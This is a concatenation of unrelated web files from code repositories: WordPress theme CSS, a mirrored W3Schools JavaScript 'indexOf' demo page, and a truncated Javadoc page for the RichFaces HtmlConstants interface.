#fff; background: #000; padding: 0 .25em .125em .25em; margin-left: 1em; line-height: 1.2; vertical-align: 25%; } .pagetitle.active {opacity: 0.2; } .content { margin: 0 20px 20px 20px; position: relative; } .section { margin: 0 0 60px 20px; position: relative; } #loading { position: fixed; bottom: 0; width: 100%; z-index: 100; text-align: center; padding: 0 20px 20px 0; } #loading span { display: inline-block; font-size: 60px; color: #3e7be4; padding: 15px 20px 20px 20px; } .fourofour {padding: 25px 20px 75px 20px;} .blankpage a { color: #000; border-bottom: 2px solid #a7a8aa; -webkit-transition: border-color 0.2s ease; -moz-transition: border-color 0.2s ease; -o-transition: border-color 0.2s ease; transition: border-color 0.2s ease; } .blankpage a:hover { border-color: #000; } @media screen and (min-width: 950px) { .breadcrumbs { display: block; margin: 0 20px; color: #c4c5c7; position: relative; z-index: 3; font-size: 14px;} .breadcrumbs p { margin: 0; } .breadcrumbs a { color: #c4c5c7;} .breadcrumbs a:hover { color: #000;} .pagetitle h2 { font-size: 60px; margin: 15px 20px; } .pagetitle span { display: inline; } .pagetitle a.showinfo { font-size: 20px; } .infoboxspacer { display: none; } .content { margin: 0 20px 60px 20px; padding-top: 93px; } .section { padding-top: 93px; } } /**/ .thumbnails { overflow: hidden; margin-left: 20px; } .thumb { float: left; width: 50%; text-align: center; margin-bottom: 20px; line-height: 0; } .thumb .thumbinner { padding: 0 20px 0 0; height: 100%; margin: 0 auto; display: inline-block; } .thumb img { max-height: 379px; } .thumb h4 { text-align: left; font-size: 14px; line-height: 1.2; margin: .25em 0;} .thumb h5 { text-align: left; font-size: 12px; line-height: 1.2; margin: .25em 0;} .thumb a { color: #8a8b8e;} ._442_year{ display:none;} /* Hides year in title of Misc Client Work on Archives page */ @media screen and (min-width: 950px) { .thumb { width: 33%; } .thumb_home { width: 33%; } } /* Index*/ .index { margin: 30px 20px 100px 20px; font-size: 20px; overflow: hidden; } .index a { -webkit-transition: background 0.2s ease; -moz-transition: background 0.2s ease; -o-transition: background 0.2s ease; transition: background 0.2s ease; } .index ul { list-style: none; margin: 0; padding: 0; display: block; clear: both; overflow: hidden; display:inline;} .index ul li { margin: 0 0 37px 0; padding: 0; } .index ul li.headerterm { clear: both; overflow: hidden; display:block;} .index ul li.headerterm span {display: block; padding-bottom: 2px; margin-bottom: 5px; } .index ul li ul li { padding: 0; display: inline; } .index ul li ul li a {background: #8a8b8e; color: #fff; margin: 0 10px 7px 0; padding: 0 .25em 2px .25em; display: block; float: left; } .index ul li ul li ul { clear: none; } .index ul li ul li ul li a {background: #c4c5c7; } .index ul.firstchild { display: block; } .index a.black { background: #000; } .index a.blue { background: #3e7be4; } .index a.brown { background: #835316; } .index a.green { background: #64ce0f; } .index a.orange { background: #ed962f; } .index a.pink { background: #F9F; } .index a.purple { background: #7c40c3; } .index a.red { background: #ed462f; } .index a.white { background: #FFFFFF; color:#c4c5c7; border:1px solid #c4c5c7; padding: 0 .25em 0 .25em; } .index a.yellow { background: #fddd33; } .index a:hover { color: #fff; background: #000; } @media screen and (min-width: 600px) { .index { -moz-column-gap: 20px; -webkit-column-gap: 20px; -moz-column-count: 2; -webkit-column-count: 2; } } @media screen and (min-width: 950px) { .index { -moz-column-count: 3; -webkit-column-count: 3; } } /* Gallery */ .infobox {margin-top: 20px; width: 100%; position: absolute; top: 0; display: none; color: #8a8b8e; z-index: 3; } .infobox .inner { border: 2px solid #000; background: #fff; max-width: 731px; margin: auto; z-index: 1; position: relative; display: none;} .infobox .inner .padding { padding: 50px 20px 0 20px; } .infobox h2 { margin: 0 0 1em 0; font-size: 20px; line-height: 1.1; color: #000; } .infobox p { margin-top: 0; } .infobox a.close { cursor: pointer; float: right; display: block; width: 19px; height: 19px; margin: 20px; background: url('images/close.svg') center center no-repeat; } .infobox a.close span { display: none; } .js .infobox:hover { cursor: move; } .slideshow { } .slide { float: left; text-align: center; margin-bottom: 20px; line-height: 0;} .slide.colspan-one { width: 50%; } .slide.colspan-one img { max-height: 569px; } .slide.colspan-two { width: 100%; } .slide.colspan-two img { max-height: 1137px; } .slide.colspan-three { width: 100%; } .slide.colspan-three img { max-height: 1137px; } .slide .slideinner { padding: 0 20px 0 0; height: 100%; } .slide .caption {display: none; } .slide a { display: block; } .slide_terms {width:220px; position:fixed; right:20px; bottom: 20px; text-align:right;} .slide_terms ul { list-style: none; margin: 0; padding: 0; display: block; clear: both; overflow: hidden; display:inline;} .slide_terms ul li { padding: 0; display: inline; } .slide_terms ul li a {background: #c4c5c7; color: #fff; margin: 0 10px 7px 0; padding: 0 .25em 2px .25em; display:inline-block;} .slide_terms ul li a:hover {background: #8a8b8e;} .js .slide .slideinner { cursor: pointer; } .detailview { display: none; text-align: center; position: absolute; top: 0; width: 100%; z-index: 3; } .enlargement { position: absolute; z-index: 4; width: 100%; display: none; } .enlargement a.close { position: relative; z-index: 5; float: right; display: block; width: 19px; height: 19px; background: url('images/close.svg') center center no-repeat; } .enlargement a.close span { display: none; } .enlargement .image { margin: auto; padding: 0 50px; position: relative; } .enlargement .image img { } .js .enlargement a { cursor: pointer; } .enlargement a.prev { position: absolute; width: 50px; left: 0; height: 100%; background: url('images/leftarrow.svg') left center no-repeat;} .enlargement a.next { position: absolute; width: 50px; right: 0; height: 100%; background: url('images/rightarrow.svg') right center no-repeat; } .enlargement a span { display: none; } .detailview a {color: #8a8b8e; } @media screen and (min-width: 950px) { .infobox {margin-top: 142px; } .infobox .inner .padding { padding: 62px; } .slide.colspan-one { width: 33.33333333333333%; } .slide.colspan-one img { max-height: 379px; } .slide.colspan-two { width: 66.66666666666666%; } .slide.colspan-two img { max-height: 758px; } .slide.colspan-three { width: 100%; } .slide.colspan-three img { max-height: 1137px; } } /* Links/Friends */ #links { margin: 30px 20px 100px 20px; font-size: 20px; overflow: hidden; } #links ul{ list-style: none; margin:0; padding: 0; display: block; clear: both; overflow: hidden; display:inline;} #links ul li { margin: 0; padding: 0; } #links ul li.headerterm { clear: both; overflow: hidden; display:block;} #links ul li.headerterm span {display: block; padding-bottom: 2px; margin-bottom: 5px; } #links ul li ul li { padding: 0; display: inline; margin: 0;} #links ul li ul li.linkcat {margin:0;} #links ul li ul li.linkcat span {background: #8a8b8e; color: #fff; margin: 0 10px 7px 0; padding: 0 .25em 2px .25em; display: block; float: left;} #links ul li ul li ul li { padding: 0; display: inline; } #links ul li ul li ul li a { background: #c4c5c7; color: #fff; margin: 0 10px 7px 0; padding: 0 .25em 2px .25em; display: block; float: left; } #links ul li ul li ul li a:hover {background: #8a8b8e;} /* Footer */ .footer { overflow: hidden; border-top: 2px solid #E2E2E3; clear: both; margin: 0 20px 40px 20px; padding-top: 30px;} .footer a { color: #000; border-bottom: 2px solid #a7a8aa; -webkit-transition: border-color 0.2s ease; -moz-transition: border-color 0.2s ease; -o-transition: border-color 0.2s ease; transition: border-color 0.2s ease; } .footer a:hover { border-color: #000; } .footer p {margin: 0;} .footer .address { font-style: normal; float: left; width: 100%; margin-top: .25em; } .footer h3 { border-bottom: 2px solid #404040; display: inline-block; font-size: 20px; margin-top: 0; } .footer ul { list-style: none; margin: .25em 0 0 0; padding: 0; float: left;} .footer li { margin: 0; padding: 0; } .footer .small { font-size: 14px; color: #8A8B8E; clear: both; padding-top: 80px; } @media screen and (min-width: 950px) { .footer .address { width: 33.33333333333333%; } } /* Colorbox */ #colorbox { position:absolute; top:0; left:0; z-index:9999; } #cboxOverlay { top:0; left:0; z-index:9999; position:fixed; width:100%; height:100%; background: #fff; } #cboxWrapper { position:absolute; top:0; left:0; z-index:9999; max-width:none; } #cboxMiddleLeft { clear:left; } #cboxBottomLeft{ clear:left; } #cboxContent{ position:relative; text-align: center; } #cboxLoadedContent{ overflow:auto; -webkit-overflow-scrolling: touch; padding: 42px 0 90px 0; } #cboxLoadingOverlay { position:absolute; top:0; left:0; width:100%; height:100%; } #cboxLoadingGraphic { position:absolute; top:0; left:0; width:100%; height:100%; background:url('images/loading.gif') no-repeat center center; background-size: 15px 22.5px; } .cboxPhoto{ float:left; margin:auto; border:0; display:block; max-width:none; -ms-interpolation-mode:bicubic; } .cboxIframe{ width:100%; height:100%; display:block; border:0; padding:0; margin:0; } #cboxError{ padding:50px; } #cboxTitle{ font-size: 14px; margin:0; width:100%; position:fixed; bottom: 15px; left: 0; color:#8a8b8e;} #cboxSlideshow{ cursor:pointer; border:0; padding:0; margin:0; overflow:visible; position:absolute; bottom:4px; right:30px;} #cboxClose { display: none; } #cboxPrevious{ cursor:pointer; border:0; padding:0; margin-left: -35px; overflow:visible; position: fixed; left: 50%; bottom: 50px; background: url('images/leftarrow.svg') left center no-repeat; width: 25px; height: 25px; text-indent:-9999px;} #cboxPrevious:hover { background: url('images/leftarrow-black.svg') left center no-repeat; } #cboxNext{ cursor:pointer; border:0; padding:0; margin-right: -35px; overflow:visible; position: fixed; left: 50%; bottom: 50px; background: url('images/rightarrow.svg') right center no-repeat; width: 25px; height: 25px; text-indent:-9999px;} #cboxNext:hover { background: url('images/rightarrow-black.svg') right center no-repeat; } #colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box; -moz-box-sizing:content-box; -webkit-box-sizing:content-box;} .cboxIE #cboxTopLeft, .cboxIE #cboxTopCenter, .cboxIE #cboxTopRight, .cboxIE #cboxBottomLeft, .cboxIE #cboxBottomCenter, .cboxIE #cboxBottomRight, .cboxIE #cboxMiddleLeft, .cboxIE #cboxMiddleRight { filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00FFFFFF,endColorstr=#00FFFFFF); } /* Category */ .category { color: #3e7be4; overflow: hidden; } .category a { color: #3e7be4; border-bottom: 1px solid #3e7be4; } .category h2 { text-align: center; font-size: 60px; margin: 9px 0 10px 0; color: #000; } .category h3 { font-size: 20px; border-bottom: 2px solid #3e7be4; margin: 20px 0 13px 0; } .category p { margin: 13px 0; } .category .margin { max-width: 820px; padding: 0 20px 100px 20px; margin: auto; }
wp-content/themes/brilliance/style-responsive.css
developingidea/wp-vaci
/* LARGE SCREENS */ @media screen and (min-width: 1280px){} /* TABLET SCREENS (LANDSCAPE) */ @media screen and (max-width: 1024px){} /* TABLET PORTRAIT */ @media screen and (max-width: 800px){ .header .logo { float:left; } .slider .slider-slides .slide-body { width:auto; padding-top:150px; } .pagetitle .pagetitle-title { float:none; font-size:2em; } .breadcrumb { float:none; } } /* SMARTPHONE */ @media only screen and (max-width: 600px){ .topmenu { display:none; } .social { float:left; } .testimonial-list .testimonial-image { max-width:150px; } /* NAVIGATION */ .menu-top { text-align:center; } .menu-top li { display:inline-block; } .menu-top li a { margin:0 auto; } .footermenu { float:none; margin:0 0 30px; } .menu-footer li a { margin:0 10px 10px 0; } }
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_indexof_array2.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_indexof_array2.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:17 GMT --> <body> <p>Click the button to display the first position of the element "Apple", starting the search at position 4:</p> <button onclick="myFunction()">Try it</button> <p id="demo"></p> <script> function myFunction() { var fruits = ["Banana", "Orange", "Apple", "Mango", "Banana", "Orange", "Apple", "Mango"]; var a = fruits.indexOf("Apple", 4); document.getElementById("demo").innerHTML = a; } </script> <p><b>Note:</b> The indexOf method was introduced in JavaScript 1.6, and does not work in Internet Explorer 8 and earlier versions.</p> </body> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_indexof_array2.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:17 GMT --> </html>
lib/richfaces/doc/javadoc/org/richfaces/renderkit/HtmlConstants.html
Jacksson/mywmsnb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_65) on Thu Oct 23 20:37:01 CEST 2014 --> <meta http-equiv="Content-Type" content="text/html" charset="UTF-8"> <title>HtmlConstants (RichFaces Distribution Assembler 4.5.0.Final API)</title> <meta name="date" content="2014-10-23"> <meta name="keywords" content="org.richfaces.renderkit.HtmlConstants interface"> <meta name="keywords" content="A_ELEMENT"> <meta name="keywords" content="BR_ELEMENT"> <meta name="keywords" content="BODY_ELEMENT"> <meta name="keywords" content="IMG_ELEMENT"> <meta name="keywords" content="INPUT_ELEM"> <meta name="keywords" content="OPTION_ELEM"> <meta name="keywords" content="INPUT_TYPE_HIDDEN"> <meta name="keywords" content="BUTTON"> <meta name="keywords" content="CAPTION_ELEMENT"> <meta name="keywords" content="CHARSET_ATTR"> <meta name="keywords" content="COORDS_ATTR"> <meta name="keywords" content="COLGROUP_ELEMENT"> <meta name="keywords" content="COL_ELEMENT"> <meta name="keywords" content="DISABLED_ATTR"> <meta name="keywords" content="DIV_ELEM"> <meta name="keywords" content="DD_ELEMENT"> <meta name="keywords" content="DL_ELEMENT"> <meta name="keywords" content="DT_ELEMENT"> <meta name="keywords" content="FORM_ELEMENT"> <meta name="keywords" content="HEAD_ELEMENT"> <meta name="keywords" content="HEIGHT_ATTRIBUTE"> <meta name="keywords" content="HREFLANG_ATTR"> <meta name="keywords" content="HREF_ATTR"> <meta name="keywords" content="HTML_ELEMENT"> <meta name="keywords" content="LINK_ELEMENT"> <meta name="keywords" content="SCRIPT_ELEM"> <meta name="keywords" content="SPAN_ELEM"> <meta name="keywords" content="TFOOT_ELEMENT"> <meta name="keywords" content="THEAD_ELEMENT"> <meta name="keywords" content="TABLE_ELEMENT"> <meta name="keywords" content="TBODY_ELEMENT"> <meta name="keywords" content="TD_ELEM"> <meta name="keywords" content="TR_ELEMENT"> <meta name="keywords" content="TH_ELEM"> <meta name="keywords" content="TITLE_ELEM"> <meta name="keywords" content="UL_ELEMENT"> <meta name="keywords" content="OL_ELEMENT"> <meta name="keywords" content="LI_ELEMENT"> <meta name="keywords" content="FRAME_ATTRIBUTE"> <meta name="keywords" content="BORDER_ATTRIBUTE"> <meta name="keywords" content="BGCOLOR_ATTRIBUTE"> <meta name="keywords" content="ACCEPT_ATTRIBUTE"> <meta name="keywords" content="ACCEPT_CHARSET_ATTRIBUTE"> <meta name="keywords" content="ACCESSKEY_ATTRIBUTE"> <meta name="keywords" content="ACTION_ATTRIBUTE"> <meta name="keywords" content="ALIGN_ATTRIBUTE"> <meta name="keywords" content="ALT_ATTRIBUTE"> <meta name="keywords" content="AUTOCOMPLETE_ATTRIBUTE"> <meta name="keywords" content="CLASS_ATTRIBUTE"> <meta name="keywords" content="COLS_ATTRIBUTE"> <meta name="keywords" content="COLSPAN_ATTRIBUTE"> <meta name="keywords" content="CELLPADDING_ATTRIBUTE"> <meta name="keywords" content="CELLSPACING_ATTRIBUTE"> <meta name="keywords" content="DIR_ATTRIBUTE"> <meta name="keywords" content="ENCTYPE_ATTRIBUTE"> <meta name="keywords" content="ID_ATTRIBUTE"> <meta name="keywords" content="LANG_ATTRIBUTE"> <meta name="keywords" content="LONGDESC_ATTRIBUTE"> <meta name="keywords" content="MAXLENGTH_ATTRIBUTE"> <meta name="keywords" content="MEDIA_ATTRIBUTE"> <meta name="keywords" content="METHOD_ATTRIBUTE"> <meta name="keywords" content="NAME_ATTRIBUTE"> <meta name="keywords" content="NOWRAP_ATTRIBUTE"> <meta name="keywords" content="ROWS_ATTRIBUTE"> <meta name="keywords" content="RULES_ATTRIBUTE"> <meta name="keywords" content="ROWSPAN_ATTRIBUTE"> <meta name="keywords" content="READONLY_ATTRIBUTE"> <meta name="keywords" content="SIZE_ATTRIBUTE"> <meta name="keywords" content="SRC_ATTRIBUTE"> <meta name="keywords" content="STYLE_ATTRIBUTE"> <meta name="keywords" content="SUMMARY_ATTRIBUTE"> <meta name="keywords" content="SCOPE_ATTRIBUTE"> <meta name="keywords" content="TABINDEX_ATTRIBUTE"> <meta name="keywords" content="TITLE_ATTRIBUTE"> <meta name="keywords" content="TARGET_ATTRIBUTE"> <meta name="keywords" content="TYPE_ATTR"> <meta name="keywords" content="USEMAP_ATTRIBUTE"> <meta name="keywords" content="VALIGN_ATTRIBUTE"> <meta name="keywords" content="VALUE_ATTRIBUTE"> <meta name="keywords" content="WIDTH_ATTRIBUTE"> <meta name="keywords" content="ONBLUR_ATTRIBUTE"> <meta name="keywords" content="ONCHANGE_ATTRIBUTE"> <meta name="keywords" content="ONCLICK_ATTRIBUTE"> <meta name="keywords" content="ONDBLCLICK_ATTRIBUTE"> <meta name="keywords" content="ONFOCUS_ATTRIBUTE"> <meta name="keywords" content="ONKEYDOWN_ATTRIBUTE"> <meta name="keywords" content="ONKEYPRESS_ATTRIBUTE"> <meta name="keywords" content="ONKEYUP_ATTRIBUTE"> <meta name="keywords" content="ONLOAD_ATTRIBUTE"> <meta name="keywords" content="ONMOUSEDOWN_ATTRIBUTE"> <meta name="keywords" content="ONMOUSEMOVE_ATTRIBUTE"> <meta name="keywords" content="ONMOUSEOUT_ATTRIBUTE"> <meta name="keywords" content="ONMOUSEOVER_ATTRIBUTE"> <meta name="keywords" content="ONMOUSEUP_ATTRIBUTE"> <meta name="keywords" content="ONRESET_ATTRIBUTE"> <meta name="keywords" content="ONSELECT_ATTRIBUTE"> <meta name="keywords" content="ONSUBMIT_ATTRIBUTE"> <meta name="keywords" content="ONUNLOAD_ATTRIBUTE"> <meta name="keywords" content="REL_ATTR"> <meta name="keywords" content="REV_ATTR"> <meta name="keywords" content="SHAPE_ATTR"> <meta name="keywords" content="STYLE_CLASS_ATTR"> <meta name="keywords" content="PASS_THRU"> <meta name="keywords" content="PASS_THRU_BOOLEAN"> <meta name="keywords" content="PASS_THRU_EVENTS"> <meta name="keywords" content="PASS_THRU_STYLES"> <meta name="keywords" content="PASS_THRU_URI"> <meta name="keywords" content="TEXT_JAVASCRIPT_TYPE"> <meta name="keywords" content="REL_STYLESHEET"> <meta name="keywords" content="CSS_TYPE"> <meta name="keywords" content="JAVASCRIPT_TYPE"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="HtmlConstants (RichFaces Distribution Assembler 4.5.0.Final API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/HtmlConstants.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><b>RichFaces Distribution Assembler 4.5.0.Final</b></em></div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../org/richfaces/renderkit/HotKeyRendererBase.html" title="class in org.richfaces.renderkit"><span class="strong">Prev Class</span></a></li> <li><a href="../../../org/richfaces/renderkit/InplaceInputRendererBase.html" title="class in org.richfaces.renderkit"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?org/richfaces/renderkit/HtmlConstants.html" target="_top">Frames</a></li> <li><a href="HtmlConstants.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li>Method</li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li>Method</li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.richfaces.renderkit</div> <h2 title="Interface HtmlConstants" class="title">Interface HtmlConstants</h2> </div> <div class="contentContainer"> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public interface <span class="strong">HtmlConstants</span></pre> <div class="block">Common HTML elements and attributes names.</div> <dl><dt><span class="strong">Version:</span></dt> <dd>$Revision: 1.1.2.6 $ $Date: 2007/02/08 19:07:16 $</dd> <dt><span class="strong">Author:</span></dt> <dd>asmirnov@exadel.com (latest modification by $Author: alexsmirnov $)</dd></dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#A_ELEMENT">A_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ACCEPT_ATTRIBUTE">ACCEPT_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ACCEPT_CHARSET_ATTRIBUTE">ACCEPT_CHARSET_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ACCESSKEY_ATTRIBUTE">ACCESSKEY_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ACTION_ATTRIBUTE">ACTION_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ALIGN_ATTRIBUTE">ALIGN_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#ALT_ATTRIBUTE">ALT_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#AUTOCOMPLETE_ATTRIBUTE">AUTOCOMPLETE_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#BGCOLOR_ATTRIBUTE">BGCOLOR_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#BODY_ELEMENT">BODY_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#BORDER_ATTRIBUTE">BORDER_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#BR_ELEMENT">BR_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#BUTTON">BUTTON</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CAPTION_ELEMENT">CAPTION_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CELLPADDING_ATTRIBUTE">CELLPADDING_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CELLSPACING_ATTRIBUTE">CELLSPACING_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CHARSET_ATTR">CHARSET_ATTR</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CLASS_ATTRIBUTE">CLASS_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#COL_ELEMENT">COL_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#COLGROUP_ELEMENT">COLGROUP_ELEMENT</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#COLS_ATTRIBUTE">COLS_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#COLSPAN_ATTRIBUTE">COLSPAN_ATTRIBUTE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#COORDS_ATTR">COORDS_ATTR</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="http://docs.oracle.com/javase/6/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a></code></td> <td class="colLast"><code><strong><a href="../../../org/richfaces/renderkit/HtmlConstants.html#CSS_TYPE">CSS_TYPE</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td 